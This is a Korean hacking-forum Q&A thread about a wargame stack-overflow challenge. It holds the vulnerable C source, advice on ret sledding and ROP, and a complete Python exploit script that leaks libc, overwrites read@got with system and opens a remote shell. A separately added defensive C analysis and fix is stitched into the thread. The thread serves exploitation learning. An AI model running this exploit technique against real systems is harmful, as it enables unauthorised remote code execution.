System Hacking

   vngkv123
Problem direction...

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1847


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>


void err(const char *message)
{
    puts(message);
    exit(-1);
}


void vuln(size_t size)
{
    char buf[size];          /* VLA: size is chosen at runtime in main() */

    read(0, buf, 0x400);     /* always reads up to 0x400 bytes, regardless of size */
}


int main(int argc, char *argv[])
{
    int fd;
    int seed;
    size_t size;

    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);

    fd = open("/dev/urandom", 0);
    if (fd < 0) err("/dev/urandom");
    read(fd, &seed, 4);      /* 4 random bytes seed the PRNG */
    close(fd);

    srand(seed);

    size = (rand() % (0x3a0 - 0x100)) + 0x100;   /* random size in [0x100, 0x3a0) */
    size &= 0xFFFFFFFC;                          /* round down to a multiple of 4 */

    puts("Executing vuln(). good luck :)");
    vuln(size);

    return 0;
}

It feels a bit like it was made with the BugBug problem as its motif..
It runs as a daemon on a remote server, NX is enabled, and I'm not sure yet about ASLR.
Should this be done by leaking that rand value, or by riding a ret sled regardless of the size that comes out of rand...?

  Hit : 2405     Date : 2017/04/04 06:04



    
해쿨러 Yes, it's a problem that wants you to do ret sledding.
The buffer is allocated with a size chosen somewhere between 0x100 and 0x3a0,
but it always reads 0x400 bytes,
so from at least 0x60 (96) bytes onward you are guaranteed to hit the ret,
so yes, you alter the execution flow with RET sledding.
You said you're not sure about ASLR yet, but ASLR will be enabled,
so you can ROP, leak libc once, then overwrite the GOT and get a shell,
and if you only need to read the flag file it can even be done in one shot.
2017/04/05  
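To make the size reasoning above concrete from the defender's side, here is an added example (not code from the thread or from the challenge itself) that factors the size formula from the posted main() into functions that can be evaluated without /dev/urandom, computes exactly how far a fixed 0x400-byte read overshoots each possible buffer, and places a hardened vuln() next to it whose read length is bound to the VLA size and whose read() result is checked. The names size_from_rand, overflow_bytes, vuln_fixed and bounded_read_demo are chosen here; bounded_read_demo pushes constructed filler through a pipe so the bounded read can be exercised stand-alone.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define READ_LEN 0x400u                  /* fixed count passed to read() in the original vuln() */
#define SIZE_MIN 0x100u                  /* lower bound added after the modulo */
#define SIZE_MOD (0x3a0u - 0x100u)       /* modulus used by the original size formula */

/* The size formula from main(), fed an explicit rand() result so the range can be
 * reasoned about deterministically. rand() never returns a negative value. */
size_t size_from_rand(int r)
{
    size_t size = ((size_t)r % SIZE_MOD) + SIZE_MIN;
    return size & 0xFFFFFFFCu;           /* same rounding-down to a multiple of 4 */
}

/* Smallest and largest VLA the original program can ever allocate. */
size_t smallest_size(void) { return size_from_rand(0); }
size_t largest_size(void)  { return size_from_rand((int)SIZE_MOD - 1); }

/* Bytes that read(0, buf, 0x400) can write past the end of a buffer of this size.
 * Every size the formula produces is below READ_LEN, so for the original program
 * this is never 0: the overflow exists for every seed, only its length varies. */
size_t overflow_bytes(size_t size)
{
    return size < READ_LEN ? READ_LEN - size : 0;
}

/* Hardened counterpart of vuln(): the read length is tied to the VLA size and the
 * return value of read() is checked instead of ignored. The fd is a parameter so
 * the function can be exercised on a pipe as well as on stdin. */
ssize_t vuln_fixed(int fd, size_t size)
{
    if (size == 0)
        return -1;
    char buf[size];
    ssize_t n = read(fd, buf, size);     /* never more than sizeof(buf) */
    if (n < 0)
        return -1;
    return n;
}

/* Harness: push `sent` bytes of constructed filler through a pipe and return how
 * many bytes vuln_fixed() accepted into a buffer of `size` bytes. */
ssize_t bounded_read_demo(size_t sent, size_t size)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    char filler[READ_LEN];
    if (sent > sizeof filler)
        sent = sizeof filler;
    memset(filler, 'A', sent);
    if (write(fds[1], filler, sent) != (ssize_t)sent) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);
    ssize_t n = vuln_fixed(fds[0], size);
    close(fds[0]);
    return n;
}

int main(void)
{
    printf("possible buffer sizes: 0x%zx .. 0x%zx\n", smallest_size(), largest_size());
    printf("overshoot past the largest buffer: 0x%zx bytes\n", overflow_bytes(largest_size()));
    printf("bounded read of 0x%x bytes into a 0x100 buffer accepted %zd bytes\n",
           READ_LEN, bounded_read_demo(READ_LEN, 0x100));
    return 0;
}
```

Because the formula rounds down to a multiple of 4 after taking the modulo, the largest buffer is 0x39c rather than 0x3a0, so the read overshoots by at least 0x64 bytes; the minimum the answer quotes (0x60) is the figure you get when rounding is ignored. The fix is the usual one for this class of bug: derive the read length from the buffer, not from a constant.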
pwnnnt God.. 2017/04/05  
vngkv123 Hitting the ret from the start is right, isn't it? Why isn't the address leaking ㅠ_ㅠ hmm 2017/04/05  
vngkv123 I gave plenty of rets and then tried puts@plt + dummy + read's or puts's GOT to leak first, is that wrong? 2017/04/05  
해쿨러 Yes, doing it that way is right.
The point at which you start hitting the ret changes with the buffer size.
If you base the rets on the maximum buffer size, 0x3a0,
then to be a bit more stable put in 0x3c0/4 of them and then write the ROP payload.
2017/04/05  
vngkv123 If the GOT address comes out negative, something must be wrong ... 2017/04/05  
vngkv123
# Python 2 script (raw_input, str payloads)
import socket
import time
import struct

p = lambda x : struct.pack("<L",x)
up = lambda x : struct.unpack("<L",x)

read_plt = 0x8048420
read_got = 0x804a00c
puts_plt = 0x8048430
ret = 0x8048623
dynamic_section = 0x8049f14
pppr = 0x8048749
system_offset = 0x3ada0
read_offset = 0xd5980

payload = ''
payload += p(ret)*240 + p(read_plt) + p(pppr)
payload += p(0) + p(dynamic_section) + p(len("/bin/sh")+1) #/bin/sh
payload += p(puts_plt) + p(0x8048766) + p(read_got) #get read addr
payload += p(read_plt) + p(pppr)
payload += p(0) + p(read_got) + p(4) #overwrite read@got
payload += p(read_plt) + "AAAA" + p(dynamic_section)


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('xxx.xxx.xxx.xxx',31007))
time.sleep(0.5)
print "[+] Sending payload ......"
s.send(payload + '\n')
time.sleep(0.5)
s.recv(1024)
s.send("/bin/sh" + "\n")
time.sleep(0.5)
resp = up(s.recv(4))
libc_addr = resp - read_offset
print "[+] libc_addr = %s" % (hex(libc_addr))
system_addr = libc_addr + system_offset
print "[+] system_addr = %s" % (hex(system_addr))
time.sleep(0.5)
s.send(p(system_addr) + '\n')
time.sleep(0.5)
print '[+] Get shell complete.......'
while True:
    cmd = raw_input("$ ")
    s.send(cmd + '\n')
    time.sleep(0.5)
    print(s.recv(1024))
s.close()

I've masked the address; I'm not sure whether the code above is written correctly.... It keeps erroring at the up(s.recv) part and I'm stuck ㅠ
2017/04/06  
해쿨러 struct.unpack returns an array
up = lambda x : struct.unpack("<L",x)
->
up = lambda x : struct.unpack("<L",x)[0]
2017/04/06  
vngkv123 In a situation where I thought the shell had been popped, I attached strace starting from the raw_input point and looked,

and if it's starting with the read(0, function, does that mean the GOT overwrite went wrong?
2017/04/06  
해쿨러 Don't attach it from there; attach it right after connect 2017/04/06  
vngkv123 I kept wondering what the problem was, and it turned out the offset was wrong ㅜㅜ lol Thanks~~ 2017/04/06  
Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org